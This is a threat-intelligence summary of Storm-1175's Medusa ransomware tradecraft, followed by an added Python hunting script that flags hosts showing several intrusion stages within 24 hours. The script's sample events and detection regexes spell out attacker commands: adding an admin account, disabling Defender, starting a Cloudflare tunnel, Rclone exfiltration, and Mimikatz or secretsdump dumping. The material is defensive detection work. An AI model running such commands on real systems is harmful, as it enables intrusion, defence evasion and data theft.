Storm-1175, a China-based actor, runs fast-moving ransomware operations: it exploits newly disclosed flaws in web-facing systems to gain initial access and then moves rapidly to deploy Medusa ransomware, sometimes within 24 hours. According to Microsoft, the group has exploited more than 16 vulnerabilities since 2023, targeting platforms such as Microsoft Exchange, Ivanti, ConnectWise, JetBrains and others, often weaponising flaws before patches are applied.
The attackers chain multiple exploits to achieve deeper access, including remote code execution on Windows and Linux systems, and in some cases have exploited vulnerabilities as zero-days, before public disclosure. After gaining access, Storm-1175 installs web shells or remote tools, creates admin accounts, moves laterally using PowerShell, PsExec, RDP and Cloudflare tunnels, and steals credentials with tools such as Impacket and Mimikatz.
The group also weakens defences by modifying antivirus settings and exfiltrates data with tools such as Rclone before deploying Medusa across the network. Storm-1175 has been observed deploying Medusa ransomware using PDQ Deployer or Group Policy, and Microsoft has provided IoCs and mitigation guidance for these attacks.
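The tool chain described above (web shell, admin account creation, antivirus tampering, Cloudflare tunnels, PsExec, credential dumping, Rclone, PDQ/Group Policy deployment) lends itself to a simple hunting query: match each stage independently, then flag hosts where several distinct stages appear within the 24-hour window the summary mentions. The script below is an added example, not code from Microsoft or from the original article. It runs over constructed Sysmon-style process-creation events embedded inline; the regexes for the IIS worker process (`w3wp.exe`) and for PDQ Deployer's process name are assumptions, as are the field names and the stage labels.

```python
"""Hunting sketch: correlate Storm-1175-style intrusion stages per host (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Each rule: (name, stage label, regex). The regex runs over the lowercased string
# "parent|image|cmdline" so a rule can key on the parent process, the binary or the arguments.
# Tool names follow the summary above; w3wp.exe and the PDQ process name are assumptions.
RULES = [
    ("IIS worker process spawning a shell (web shell)", "web_shell",
     re.compile(r"w3wp\.exe\|[^|]*(cmd|powershell)\.exe\|")),
    ("local account created / added to Administrators", "account_creation",
     re.compile(r"\bnet1?(\.exe)? (user \S+ \S+ /add|localgroup administrators \S+ /add)")),
    ("Defender real-time protection disabled or exclusion added", "av_tampering",
     re.compile(r"(set|add)-mppreference .*-(disablerealtimemonitoring|exclusionpath)")),
    ("Cloudflare tunnel started", "tunnel",
     re.compile(r"cloudflared(\.exe)? tunnel")),
    ("PsExec remote execution", "lateral_movement",
     re.compile(r"\|[^|]*psexe(c|svc)\.exe\|")),
    ("credential dumping tool (Mimikatz / Impacket secretsdump)", "cred_dump",
     re.compile(r"mimikatz|sekurlsa::|secretsdump")),
    ("Rclone copy/sync to a remote", "exfil",
     re.compile(r"rclone(\.exe)? (copy|sync|move) ")),
    ("PDQ Deployer runner (assumed process name)", "deployment",
     re.compile(r"pdqdeploy")),
]

# Constructed sample telemetry; not real logs. EXCH01 shows a chain, WS07 a benign lookup.
EVENTS = [
    {"ts": "2025-01-10T01:02:00", "host": "EXCH01", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"ts": "2025-01-10T01:05:00", "host": "EXCH01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\net.exe", "cmdline": "net user svc_backup <password> /add"},
    {"ts": "2025-01-10T01:06:00", "host": "EXCH01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": "2025-01-10T02:10:00", "host": "EXCH01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Temp\cloudflared.exe", "cmdline": "cloudflared.exe tunnel run --token <redacted>"},
    {"ts": "2025-01-10T03:30:00", "host": "EXCH01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Temp\rclone.exe", "cmdline": "rclone.exe copy D:\\Shares remote:bucket --transfers 32"},
    {"ts": "2025-01-10T04:00:00", "host": "WS07", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\net.exe", "cmdline": "net user jsmith"},
]


def match_rules(event):
    """Return [(rule name, stage)] for every rule that fires on one process-creation event."""
    haystack = f"{event['parent']}|{event['image']}|{event['cmdline']}".lower()
    return [(name, stage) for name, stage, rx in RULES if rx.search(haystack)]


def hunt(events, window=timedelta(hours=24), min_stages=3):
    """Map host -> sorted stage labels for hosts showing >= min_stages distinct stages inside `window`.

    A single stage (one rclone run, one account creation) is often benign; several distinct
    stages on one host within a day is the pattern worth paging on.
    """
    per_host = defaultdict(list)
    for ev in events:
        for name, stage in match_rules(ev):
            per_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), stage, name))

    flagged = {}
    for host, hits in per_host.items():
        hits.sort()
        for i, (t0, _, _) in enumerate(hits):
            stages = {stage for t, stage, _ in hits[i:] if t - t0 <= window}
            if len(stages) >= min_stages:
                flagged[host] = sorted(stages)
                break
    return flagged


if __name__ == "__main__":
    for host, stages in hunt(EVENTS).items():
        print(f"{host}: {', '.join(stages)}")
```

The per-stage rules are deliberately loose (a string match on a command line is easy to evade by renaming a binary), so the value is in the correlation step: requiring three or more distinct stages on one host within a day keeps single benign hits such as an administrator's own Rclone backup from paging anyone, while the fast chain the summary describes still stands out.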